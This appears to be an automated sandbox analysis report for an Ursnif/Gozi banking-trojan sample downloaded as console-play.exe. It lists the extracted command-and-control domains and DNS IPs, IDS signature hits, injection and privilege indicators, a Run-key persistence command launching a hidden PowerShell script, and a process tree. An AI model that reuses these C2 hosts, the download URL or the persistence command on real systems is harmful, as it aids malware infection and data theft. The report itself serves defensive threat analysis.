Analysis
-
max time kernel
1203s -
max time network
1194s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
16-08-2021 19:12
Static task
static1
URLScan task
urlscan1
Sample
http://ntv-play.com/video/04169823/tls/console-play.exe
General
Malware Config
Extracted
gozi_ifsb
1001
updates.esset.com
jensjen.in
strongbilt.cc
drauduburr.ws
besstrown.cn
druckenshtalen.mn
grantedii.co
loudam62.tk
libricee.in
burbasoftw.pw
waiseen.io
trumphujtebevrot.bit
ymxslfmppjcvwkrjtfnr.co
ohnjjxasfxgxiakhtohn.in
hnhccsotdqftyicvossk.at
xcgrdxcmfirfvignnfea.ws
umvwdtbenbinronbohcc.pw
-
dga_season
10
-
dns_servers
107.174.86.134
107.175.127.22
-
exe_type
worker
-
server_id
12
Signatures
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
WerFault.exeWerFault.exedescription pid process target process PID 1896 created 4072 1896 WerFault.exe chrome.exe PID 4572 created 3596 4572 WerFault.exe chrome.exe -
suricata: ET MALWARE Ursnif Variant CnC Beacon
suricata: ET MALWARE Ursnif Variant CnC Beacon
-
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B)
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B)
-
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
-
Downloads MZ/PE file
-
Executes dropped EXE 9 IoCs
Processes:
console-play.execonsole-play.tmpconsole-play.execonsole-play.tmpBouncyDotNET.exesoftware_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exepid process 4276 console-play.exe 4528 console-play.tmp 5076 console-play.exe 4204 console-play.tmp 4868 BouncyDotNET.exe 4100 software_reporter_tool.exe 4592 software_reporter_tool.exe 4564 software_reporter_tool.exe 4200 software_reporter_tool.exe -
Loads dropped DLL 8 IoCs
Processes:
BouncyDotNET.exesoftware_reporter_tool.exepid process 4868 BouncyDotNET.exe 4564 software_reporter_tool.exe 4564 software_reporter_tool.exe 4564 software_reporter_tool.exe 4564 software_reporter_tool.exe 4564 software_reporter_tool.exe 4564 software_reporter_tool.exe 4564 software_reporter_tool.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Explorer.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\ManagerMemory = "cmd /c start C:\\Users\\Admin\\ManagerMemory.lnk -ep unrestricted -file C:\\Users\\Admin\\MaskStop.ps1" Explorer.EXE -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 27 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exechrome.exesoftware_reporter_tool.exedescription pid process target process PID 4736 set thread context of 3056 4736 powershell.exe Explorer.EXE PID 3056 set thread context of 3668 3056 Explorer.EXE RuntimeBroker.exe PID 3056 set thread context of 808 3056 Explorer.EXE chrome.exe PID 3056 set thread context of 1876 3056 Explorer.EXE chrome.exe PID 3056 set thread context of 3244 3056 Explorer.EXE cmd.exe PID 3056 set thread context of 736 3056 Explorer.EXE chrome.exe PID 3056 set thread context of 492 3056 Explorer.EXE chrome.exe PID 3056 set thread context of 3252 3056 Explorer.EXE chrome.exe PID 3244 set thread context of 4252 3244 cmd.exe PING.EXE PID 808 set thread context of 2124 808 chrome.exe chrome.exe PID 3056 set thread context of 3596 3056 Explorer.EXE chrome.exe PID 3056 set thread context of 4072 3056 Explorer.EXE chrome.exe PID 808 set thread context of 4908 808 chrome.exe chrome.exe PID 808 set thread context of 3128 808 chrome.exe chrome.exe PID 808 set thread context of 4304 808 chrome.exe chrome.exe PID 808 set thread context of 1552 808 chrome.exe chrome.exe PID 808 set thread context of 2648 808 chrome.exe chrome.exe PID 808 set thread context of 4964 808 chrome.exe chrome.exe PID 808 set thread context of 4492 808 chrome.exe chrome.exe PID 808 set thread context of 4100 808 chrome.exe software_reporter_tool.exe PID 4100 set thread context of 4592 4100 software_reporter_tool.exe software_reporter_tool.exe PID 4100 set thread context of 4564 4100 software_reporter_tool.exe software_reporter_tool.exe PID 4100 set thread context of 4200 4100 software_reporter_tool.exe software_reporter_tool.exe PID 808 set thread context of 4108 808 chrome.exe chrome.exe PID 808 set thread context of 5024 808 chrome.exe chrome.exe PID 808 set thread context of 4072 808 chrome.exe chrome.exe PID 808 set thread context of 4504 808 chrome.exe chrome.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 4572 3596 WerFault.exe chrome.exe 1896 4072 WerFault.exe chrome.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
chrome.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 4252 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
chrome.exechrome.exechrome.exechrome.exechrome.execonsole-play.tmpchrome.exechrome.exechrome.exeBouncyDotNET.exepowershell.exeExplorer.EXEchrome.exeWerFault.exepid process 492 chrome.exe 492 chrome.exe 808 chrome.exe 808 chrome.exe 4480 chrome.exe 4480 chrome.exe 5064 chrome.exe 5064 chrome.exe 4668 chrome.exe 4668 chrome.exe 4204 console-play.tmp 4204 console-play.tmp 5104 chrome.exe 5104 chrome.exe 3840 chrome.exe 3840 chrome.exe 2820 chrome.exe 2820 chrome.exe 2820 chrome.exe 2820 chrome.exe 4868 BouncyDotNET.exe 4868 BouncyDotNET.exe 4736 powershell.exe 4736 powershell.exe 4736 powershell.exe 3056 Explorer.EXE 3056 Explorer.EXE 2124 chrome.exe 2124 chrome.exe 3056 Explorer.EXE 3056 Explorer.EXE 3056 Explorer.EXE 3056 Explorer.EXE 3056 Explorer.EXE 3056 Explorer.EXE 3056 Explorer.EXE 3056 Explorer.EXE 3056 Explorer.EXE 3056 Explorer.EXE 3056 Explorer.EXE 3056 Explorer.EXE 3056 Explorer.EXE 3056 Explorer.EXE 3056 Explorer.EXE 4572 WerFault.exe 4572 WerFault.exe 4572 WerFault.exe 4572 WerFault.exe 4572 WerFault.exe 4572 WerFault.exe 4572 WerFault.exe 4572 WerFault.exe 4572 WerFault.exe 4572 WerFault.exe 4572 WerFault.exe 4572 WerFault.exe 4572 WerFault.exe 4572 WerFault.exe 4572 WerFault.exe 4572 WerFault.exe 3056 Explorer.EXE 3056 Explorer.EXE 4572 WerFault.exe 4572 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3056 Explorer.EXE -
Suspicious behavior: MapViewOfSection 27 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exechrome.exesoftware_reporter_tool.exepid process 4736 powershell.exe 3056 Explorer.EXE 3056 Explorer.EXE 3056 Explorer.EXE 3056 Explorer.EXE 3056 Explorer.EXE 3056 Explorer.EXE 3056 Explorer.EXE 3244 cmd.exe 808 chrome.exe 3056 Explorer.EXE 3056 Explorer.EXE 808 chrome.exe 808 chrome.exe 808 chrome.exe 808 chrome.exe 808 chrome.exe 808 chrome.exe 808 chrome.exe 808 chrome.exe 4100 software_reporter_tool.exe 4100 software_reporter_tool.exe 4100 software_reporter_tool.exe 808 chrome.exe 808 chrome.exe 808 chrome.exe 808 chrome.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
Processes:
powershell.exeExplorer.EXEWerFault.exeWerFault.exesoftware_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exedescription pid process Token: SeDebugPrivilege 4736 powershell.exe Token: SeShutdownPrivilege 3056 Explorer.EXE Token: SeCreatePagefilePrivilege 3056 Explorer.EXE Token: SeDebugPrivilege 4572 WerFault.exe Token: SeDebugPrivilege 1896 WerFault.exe Token: SeShutdownPrivilege 3056 Explorer.EXE Token: SeCreatePagefilePrivilege 3056 Explorer.EXE Token: SeShutdownPrivilege 3056 Explorer.EXE Token: SeCreatePagefilePrivilege 3056 Explorer.EXE Token: SeShutdownPrivilege 3056 Explorer.EXE Token: SeCreatePagefilePrivilege 3056 Explorer.EXE Token: SeShutdownPrivilege 3056 Explorer.EXE Token: SeCreatePagefilePrivilege 3056 Explorer.EXE Token: SeShutdownPrivilege 3056 Explorer.EXE Token: SeCreatePagefilePrivilege 3056 Explorer.EXE Token: SeShutdownPrivilege 3056 Explorer.EXE Token: SeCreatePagefilePrivilege 3056 Explorer.EXE Token: 33 4592 software_reporter_tool.exe Token: SeIncBasePriorityPrivilege 4592 software_reporter_tool.exe Token: 33 4100 software_reporter_tool.exe Token: SeIncBasePriorityPrivilege 4100 software_reporter_tool.exe Token: 33 4564 software_reporter_tool.exe Token: SeIncBasePriorityPrivilege 4564 software_reporter_tool.exe Token: 33 4200 software_reporter_tool.exe Token: SeIncBasePriorityPrivilege 4200 software_reporter_tool.exe Token: SeShutdownPrivilege 3056 Explorer.EXE Token: SeCreatePagefilePrivilege 3056 Explorer.EXE Token: SeShutdownPrivilege 3056 Explorer.EXE Token: SeCreatePagefilePrivilege 3056 Explorer.EXE Token: SeShutdownPrivilege 3056 Explorer.EXE Token: SeCreatePagefilePrivilege 3056 Explorer.EXE Token: SeShutdownPrivilege 3056 Explorer.EXE Token: SeCreatePagefilePrivilege 3056 Explorer.EXE Token: SeShutdownPrivilege 3056 Explorer.EXE Token: SeCreatePagefilePrivilege 3056 Explorer.EXE Token: SeShutdownPrivilege 3056 Explorer.EXE Token: SeCreatePagefilePrivilege 3056 Explorer.EXE Token: SeShutdownPrivilege 3056 Explorer.EXE Token: SeCreatePagefilePrivilege 3056 Explorer.EXE Token: SeShutdownPrivilege 3056 Explorer.EXE Token: SeCreatePagefilePrivilege 3056 Explorer.EXE Token: SeShutdownPrivilege 3056 Explorer.EXE Token: SeCreatePagefilePrivilege 3056 Explorer.EXE Token: SeShutdownPrivilege 3056 Explorer.EXE Token: SeCreatePagefilePrivilege 3056 Explorer.EXE -
Suspicious use of FindShellTrayWindow 14 IoCs
Processes:
chrome.execonsole-play.tmppid process 808 chrome.exe 808 chrome.exe 808 chrome.exe 808 chrome.exe 808 chrome.exe 808 chrome.exe 808 chrome.exe 808 chrome.exe 808 chrome.exe 808 chrome.exe 808 chrome.exe 808 chrome.exe 808 chrome.exe 4204 console-play.tmp -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 3056 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid process target process PID 808 wrote to memory of 1876 808 chrome.exe chrome.exe PID 808 wrote to memory of 1876 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 736 808 chrome.exe chrome.exe PID 808 wrote to memory of 492 808 chrome.exe chrome.exe PID 808 wrote to memory of 492 808 chrome.exe chrome.exe PID 808 wrote to memory of 3252 808 chrome.exe chrome.exe PID 808 wrote to memory of 3252 808 chrome.exe chrome.exe PID 808 wrote to memory of 3252 808 chrome.exe chrome.exe PID 808 wrote to memory of 3252 808 chrome.exe chrome.exe PID 808 wrote to memory of 3252 808 chrome.exe chrome.exe PID 808 wrote to memory of 3252 808 chrome.exe chrome.exe PID 808 wrote to memory of 3252 808 chrome.exe chrome.exe PID 808 wrote to memory of 3252 808 chrome.exe chrome.exe PID 808 wrote to memory of 3252 808 chrome.exe chrome.exe PID 808 wrote to memory of 3252 808 chrome.exe chrome.exe PID 808 wrote to memory of 3252 808 chrome.exe chrome.exe PID 808 wrote to memory of 3252 808 chrome.exe chrome.exe PID 808 wrote to memory of 3252 808 chrome.exe chrome.exe PID 808 wrote to memory of 3252 808 chrome.exe chrome.exe PID 808 wrote to memory of 3252 808 chrome.exe chrome.exe PID 808 wrote to memory of 3252 808 chrome.exe chrome.exe PID 808 wrote to memory of 3252 808 chrome.exe chrome.exe PID 808 wrote to memory of 3252 808 chrome.exe chrome.exe PID 808 wrote to memory of 3252 808 chrome.exe chrome.exe PID 808 wrote to memory of 3252 808 chrome.exe chrome.exe
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3668
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3056 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" http://ntv-play.com/video/04169823/tls/console-play.exe2⤵
- Suspicious use of SetThreadContext
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffa10b94f50,0x7ffa10b94f60,0x7ffa10b94f703⤵PID:1876
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1624 /prefetch:23⤵PID:736
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1672 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:492
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2228 /prefetch:83⤵PID:3252
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2652 /prefetch:13⤵PID:3596
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3596 -s 6724⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4572
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2660 /prefetch:13⤵PID:4072
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4072 -s 7924⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1896
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:13⤵PID:3040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:13⤵PID:1152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:13⤵PID:3108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:13⤵PID:4012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5276 /prefetch:83⤵PID:4240
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5092 /prefetch:83⤵PID:4256
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5652 /prefetch:83⤵PID:4280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5812 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:4480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6136 /prefetch:83⤵PID:4596
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6724 /prefetch:83⤵PID:4660
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6168 /prefetch:83⤵PID:4712
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6832 /prefetch:83⤵PID:4764
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6244 /prefetch:83⤵PID:4816
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7024 /prefetch:83⤵PID:4844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6216 /prefetch:83⤵PID:4892
-
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings3⤵PID:4952
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0x7ff66ae5a890,0x7ff66ae5a8a0,0x7ff66ae5a8b04⤵PID:5004
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7148 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:5064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6056 /prefetch:83⤵PID:1772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5692 /prefetch:83⤵PID:4140
-
-
C:\Users\Admin\Downloads\console-play.exe"C:\Users\Admin\Downloads\console-play.exe"3⤵
- Executes dropped EXE
PID:4276 -
C:\Users\Admin\AppData\Local\Temp\is-TTD2Q.tmp\console-play.tmp"C:\Users\Admin\AppData\Local\Temp\is-TTD2Q.tmp\console-play.tmp" /SL5="$601F0,5898797,953344,C:\Users\Admin\Downloads\console-play.exe"4⤵
- Executes dropped EXE
PID:4528 -
C:\Users\Admin\Downloads\console-play.exe"C:\Users\Admin\Downloads\console-play.exe" /VERYSILENT5⤵
- Executes dropped EXE
PID:5076 -
C:\Users\Admin\AppData\Local\Temp\is-E6VFP.tmp\console-play.tmp"C:\Users\Admin\AppData\Local\Temp\is-E6VFP.tmp\console-play.tmp" /SL5="$301F8,5898797,953344,C:\Users\Admin\Downloads\console-play.exe" /VERYSILENT6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:4204 -
C:\Users\Admin\AppData\Roaming\Bouncy for .NET Helper\BouncyDotNET.exe"C:\Users\Admin\AppData\Roaming\Bouncy for .NET Helper\BouncyDotNET.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4868
-
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6932 /prefetch:83⤵PID:4148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6928 /prefetch:83⤵PID:4604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6892 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:4668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5632 /prefetch:83⤵PID:4684
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5692 /prefetch:83⤵PID:4728
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7100 /prefetch:83⤵PID:4760
-
-
